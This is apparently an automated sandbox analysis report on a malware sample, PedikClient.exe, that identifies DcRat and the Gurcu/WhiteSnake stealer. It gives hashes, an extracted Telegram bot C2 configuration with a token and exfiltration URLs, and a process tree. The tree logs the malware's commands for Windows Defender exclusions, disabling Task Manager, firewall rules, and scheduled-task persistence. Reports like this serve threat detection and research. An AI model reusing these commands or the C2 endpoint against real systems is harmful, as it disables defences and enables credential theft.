Resubmissions

23-10-2024 02:31

241023-czs5ssydnj 10

23-10-2024 02:28

241023-cygelsxakf 10

Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    23-10-2024 02:28

General

  • Target
    PedikClient.exe
  • Size
    1.7MB
  • MD5
    28d6347c722e5cac5ae9245b16d4754c
  • SHA1
    45a79b7368ec79516ab1772188bec1b36c43d498
  • SHA256
    eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1
  • SHA512
    643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181
  • SSDEEP
    49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15

Malware Config

Extracted

  • Family
    gurcu
  • C2
    https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CGoogle%5Cdwm.ex
    https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713

Signatures

  • DcRat 11 IoCs

    DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 7 IoCs
  • Process spawned unexpected child process 19 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 6 IoCs
  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive data.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 58 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 45 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\PedikClient.exe
    "C:\Users\Admin\AppData\Local\Temp\PedikClient.exe"
    1⤵
    • DcRat
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Injector.exe"
      2⤵
      • DcRat
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1188
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\System32\Pj3sASAQmYbZO22AgnND3YNrHBGc.vbe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\7laDcN0rCRiiFFEryGzr87P90jYlcM.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2552
          • C:\Windows\SysWOW64\SystemUpdates.exe
            "C:\Windows\System32\SystemUpdates.exe"
            5⤵
            • Modifies WinLogon for persistence
            • UAC bypass
            • Executes dropped EXE
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Drops file in Program Files directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:4100
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4836
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4892
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4480
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4668
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4060
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4848
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:3340
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4736
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:1668
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:4928
            • C:\Program Files (x86)\Google\dwm.exe
              "C:\Program Files (x86)\Google\dwm.exe"
              6⤵
              • Modifies WinLogon for persistence
              • UAC bypass
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:4320
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da189635-e194-4091-ac06-732c716850a2.vbs"
                7⤵
                  PID:2472
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bfb84b27-316d-47b6-a319-30e6d6186c3e.vbs"
                7⤵
                PID:1328
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://localhost:12587/
                7⤵
                • Enumerates system info in registry
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:4732
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbd2a83cb8,0x7ffbd2a83cc8,0x7ffbd2a83cd8
                  8⤵
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:1388
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2060 /prefetch:2
                  8⤵
                  PID:1992
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
                  8⤵
                  PID:3860
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:8
                  8⤵
                  PID:4108
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                  8⤵
                  PID:1900
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                  8⤵
                  PID:3076
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
                  8⤵
                  PID:2832
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                  8⤵
                  PID:3088
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 /prefetch:8
                  8⤵
                  PID:1452
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
                  8⤵
                  PID:1640
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
                  8⤵
                  PID:4040
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
                  8⤵
                  PID:432
                • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
                  8⤵
                  PID:712
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                  8⤵
                  PID:2832
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                  8⤵
                  PID:4348
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
                  8⤵
                  PID:1532
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qzqLwOyuSO.bat" "
                7⤵
                PID:2448
                • C:\Windows\System32\w32tm.exe
                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  8⤵
                  PID:3864
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:1048
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4976
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe" "ExInjector.exe" ENABLE
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2872
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\sysmon.exe'" /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1328
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default\SendTo\sysmon.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1696
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\sysmon.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2804
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1864
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4220
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2120
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\dwm.exe'" /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4400
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\dwm.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:5028
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\dwm.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4796
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4604
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:4488
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2780
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "SystemUpdates" /f
    1⤵
    • Process spawned unexpected child process
    PID:3892
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "SystemUpdatesS" /f
    1⤵
    • Process spawned unexpected child process
    PID:3620
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "sysmon" /f
    1⤵
    • Process spawned unexpected child process
    PID:3800
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "sysmons" /f
    1⤵
    • Process spawned unexpected child process
    PID:2904
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "dllhost" /f
    1⤵
    • Process spawned unexpected child process
    PID:3408
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "dllhostd" /f
    1⤵
    • Process spawned unexpected child process
    PID:3032
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "dwm" /f
    1⤵
    • Process spawned unexpected child process
    PID:964
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "dwmd" /f
    1⤵
    • Process spawned unexpected child process
    PID:712
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "dwm" /f
    1⤵
    • Process spawned unexpected child process
    PID:236
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /delete /tn "dwmd" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:2988
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              1⤵
                                              • Suspicious use of FindShellTrayWindow
                                              PID:2820
                                              • C:\Windows\explorer.exe
                                                explorer.exe /LOADSAVEDWINDOWS
                                                2⤵
                                                • Boot or Logon Autostart Execution: Active Setup
                                                • Enumerates connected drives
                                                • Checks SCSI registry key(s)
                                                • Modifies registry class
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2804
                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                              1⤵
                                              • Enumerates system info in registry
                                              • Modifies Internet Explorer settings
                                              • Modifies registry class
                                              • Suspicious use of SetWindowsHookEx
                                              PID:1032
                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                              1⤵
                                              • Modifies registry class
                                              • Suspicious use of SetWindowsHookEx
                                              PID:1392

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Downloads

                                            • memory/1032-478-0x000001E843100000-0x000001E843200000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-540-0x000001E875710000-0x000001E875730000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/1032-621-0x000001E87B480000-0x000001E87B580000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-542-0x000001E8774F0000-0x000001E877510000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/1032-541-0x000001E8777C0000-0x000001E8778C0000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-498-0x000001E864C00000-0x000001E864D00000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1032-454-0x000001E843100000-0x000001E843200000-memory.dmp

                                              Filesize

                                              1024KB

                                            • memory/1668-71-0x0000025FAB080000-0x0000025FAB0A2000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/4100-33-0x0000000002C90000-0x0000000002CAC000-memory.dmp

                                              Filesize

                                              112KB

                                            • memory/4100-38-0x0000000002E80000-0x0000000002E8C000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/4100-37-0x0000000002E70000-0x0000000002E7A000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4100-32-0x0000000000990000-0x0000000000B20000-memory.dmp

                                              Filesize

                                              1.6MB

                                            • memory/4100-45-0x000000001BF80000-0x000000001BF88000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-43-0x000000001BF60000-0x000000001BF6A000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4100-35-0x0000000002CC0000-0x0000000002CC8000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-48-0x000000001BFC0000-0x000000001BFCC000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/4100-47-0x000000001BFB0000-0x000000001BFBA000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4100-36-0x0000000002CD0000-0x0000000002CE6000-memory.dmp

                                              Filesize

                                              88KB

                                            • memory/4100-34-0x000000001BDC0000-0x000000001BE10000-memory.dmp

                                              Filesize

                                              320KB

                                            • memory/4100-42-0x000000001B8A0000-0x000000001B8A8000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-40-0x000000001B880000-0x000000001B88C000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/4100-41-0x000000001B890000-0x000000001B898000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-39-0x000000001B870000-0x000000001B878000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4100-44-0x000000001BF70000-0x000000001BF7E000-memory.dmp

                                              Filesize

                                              56KB

                                            • memory/4100-46-0x000000001BF90000-0x000000001BF9E000-memory.dmp

                                              Filesize

                                              56KB

                                            • memory/4320-188-0x0000000020B30000-0x0000000021058000-memory.dmp

                                              Filesize

                                              5.2MB

                                            • memory/4320-187-0x000000001FC60000-0x000000001FE22000-memory.dmp

                                              Filesize

                                              1.8MB